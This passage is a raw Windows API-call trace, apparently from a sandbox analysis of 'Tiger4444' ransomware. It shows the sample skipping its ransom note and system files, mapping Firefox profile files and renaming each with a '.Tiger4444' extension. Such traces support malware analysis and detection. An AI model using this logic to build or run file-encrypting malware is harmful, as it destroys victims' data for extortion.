cFileName="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", cAlternateFileName="150478~1.JSO")) returned 1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="Tiger4444.exe") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2=".") returned 1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="..") returned 1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="windows") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="bootmgr") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="pagefile.sys") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="boot") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="ids.txt") returned -1 [0051.697] lstrcmpiW (lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0051.697] lstrcpyW (in: lpString1=0x30aeb7a, lpString2="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" | out: lpString1="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4") returned="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" [0051.697] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4", dwFileAttributes=0x0) returned 1 [0051.698] lstrlenW (lpString="1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4") returned 70 [0051.698] lstrlenW (lpString="Tiger4444") returned 9 [0051.698] lstrcmpiW (lpString1="e.jsonlz4", lpString2="Tiger4444") returned -1 [0051.698] lstrlenW (lpString=".dll") returned 4 [0051.698] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0051.698] lstrlenW (lpString=".lnk") returned 4 [0051.698] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0051.698] lstrlenW (lpString=".ini") returned 4 [0051.698] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0051.698] lstrlenW (lpString=".sys") returned 4 [0051.698] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0051.698] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.698] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.698] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14315112822) returned 1 [0051.698] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=3036) returned 1 [0051.698] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0051.698] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0051.698] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xee0, lpName=0x0) returned 0x2a4 [0051.699] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xee0) returned 0xbe0000 [0051.700] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc7d140 [0051.700] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0051.700] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.700] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0051.700] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.700] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0051.700] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.700] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0051.700] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14315352056) returned 1 [0051.700] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0051.701] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0051.701] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.701] CloseHandle (hObject=0x2a4) returned 1 [0051.701] CloseHandle (hObject=0x2c8) returned 1 [0051.701] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.Tiger4444") returned 185 [0051.701] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700362.8d7a0e36-bec8-411d-a84e-102fe642b34c.new-profile.jsonlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.702] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x147ab83f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x147ab83f, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x147acbbc, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x1959, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", cAlternateFileName="150478~2.JSO")) returned 1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="Tiger4444.exe") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2=".") returned 1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="..") returned 1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="windows") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="bootmgr") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="boot") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="ids.txt") returned -1 [0051.702] lstrcmpiW (lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0051.702] lstrcpyW (in: lpString1=0x30aeb7a, lpString2="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" | out: lpString1="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4") returned="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" [0051.702] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0051.702] lstrlenW (lpString="1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4") returned 63 [0051.703] lstrlenW (lpString="Tiger4444") returned 9 [0051.703] lstrcmpiW (lpString1="n.jsonlz4", lpString2="Tiger4444") returned -1 [0051.703] lstrlenW (lpString=".dll") returned 4 [0051.703] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0051.703] lstrlenW (lpString=".lnk") returned 4 [0051.703] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0051.703] lstrlenW (lpString=".ini") returned 4 [0051.703] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0051.703] lstrlenW (lpString=".sys") returned 4 [0051.703] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0051.703] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.703] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.703] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14315624862) returned 1 [0051.703] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=6489) returned 1 [0051.703] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0051.703] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0051.703] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1c60, lpName=0x0) returned 0x2a4 [0051.704] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c60) returned 0xbe0000 [0051.742] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.743] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0051.743] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.743] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.743] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.743] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.743] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.743] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0051.743] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14319630183) returned 1 [0051.743] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0051.743] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0051.743] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.743] CloseHandle (hObject=0x2a4) returned 1 [0051.744] CloseHandle (hObject=0x2c8) returned 1 [0051.744] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.Tiger4444") returned 178 [0051.744] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782700422.8c4e2942-e5f4-4855-97dc-f61d51d3c336.main.jsonlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.744] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4853f871, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4853f871, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x48566a5e, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x173b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", cAlternateFileName="150478~3.JSO")) returned 1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="Tiger4444.exe") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2=".") returned 1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="..") returned 1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="windows") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="bootmgr") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="boot") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="ids.txt") returned -1 [0051.745] lstrcmpiW (lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0051.745] lstrcpyW (in: lpString1=0x30aeb7a, lpString2="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" | out: lpString1="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4") returned="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" [0051.745] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0051.745] lstrlenW (lpString="1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4") returned 63 [0051.745] lstrlenW (lpString="Tiger4444") returned 9 [0051.745] lstrcmpiW (lpString1="n.jsonlz4", lpString2="Tiger4444") returned -1 [0051.745] lstrlenW (lpString=".dll") returned 4 [0051.745] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0051.746] lstrlenW (lpString=".lnk") returned 4 [0051.746] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0051.746] lstrlenW (lpString=".ini") returned 4 [0051.746] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0051.746] lstrlenW (lpString=".sys") returned 4 [0051.746] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0051.746] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c8 [0051.746] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.746] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14319913152) returned 1 [0051.746] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5947) returned 1 [0051.746] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89a40 [0051.746] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0051.746] CreateFileMappingW (hFile=0x2c8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a40, lpName=0x0) returned 0x2a4 [0051.747] MapViewOfFile (hFileMappingObject=0x2a4, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a40) returned 0xbe0000 [0051.760] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc8d0f8 [0051.760] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0051.760] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8d0f8 | out: hHeap=0xc50000) returned 1 [0051.760] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0051.760] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0051.760] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0051.760] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0051.760] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0051.760] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14321353775) returned 1 [0051.760] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89a40 | out: hHeap=0xc50000) returned 1 [0051.761] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0051.761] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.761] CloseHandle (hObject=0x2a4) returned 1 [0051.761] CloseHandle (hObject=0x2c8) returned 1 [0051.761] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.Tiger4444") returned 178 [0051.761] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504782787404.28ee5fa8-af9e-4f7d-aa11-b25b15612513.main.jsonlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.762] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdd249bf, ftCreationTime.dwHighDateTime=0x1d327cb, ftLastAccessTime.dwLowDateTime=0xcdd249bf, ftLastAccessTime.dwHighDateTime=0x1d327cb, ftLastWriteTime.dwLowDateTime=0xcdd249bf, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x198a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", cAlternateFileName="150478~4.JSO")) returned 1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="Tiger4444.exe") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2=".") returned 1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="..") returned 1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="windows") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="bootmgr") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="pagefile.sys") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="boot") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="ids.txt") returned -1 [0051.762] lstrcmpiW (lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", lpString2="NTUSER.DAT") returned -1 [0051.762] lstrcpyW (in: lpString1=0x30aeb7a, lpString2="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" | out: lpString1="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4") returned="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" [0051.762] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4", dwFileAttributes=0x0) returned 1 [0051.763] lstrlenW (lpString="1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4") returned 63 [0051.763] lstrlenW (lpString="Tiger4444") returned 9 [0051.763] lstrcmpiW (lpString1="n.jsonlz4", lpString2="Tiger4444") returned -1 [0051.763] lstrlenW (lpString=".dll") returned 4 [0051.763] lstrcmpiW (lpString1="nlz4", lpString2=".dll") returned 1 [0051.763] lstrlenW (lpString=".lnk") returned 4 [0051.763] lstrcmpiW (lpString1="nlz4", lpString2=".lnk") returned 1 [0051.763] lstrlenW (lpString=".ini") returned 4 [0051.763] lstrcmpiW (lpString1="nlz4", lpString2=".ini") returned 1 [0051.763] lstrlenW (lpString=".sys") returned 4 [0051.763] lstrcmpiW (lpString1="nlz4", lpString2=".sys") returned 1 [0051.764] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\archived\\2017-09\\1504783440876.798e2708-6f71-46fe-bac8-653e0a71e662.main.jsonlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, 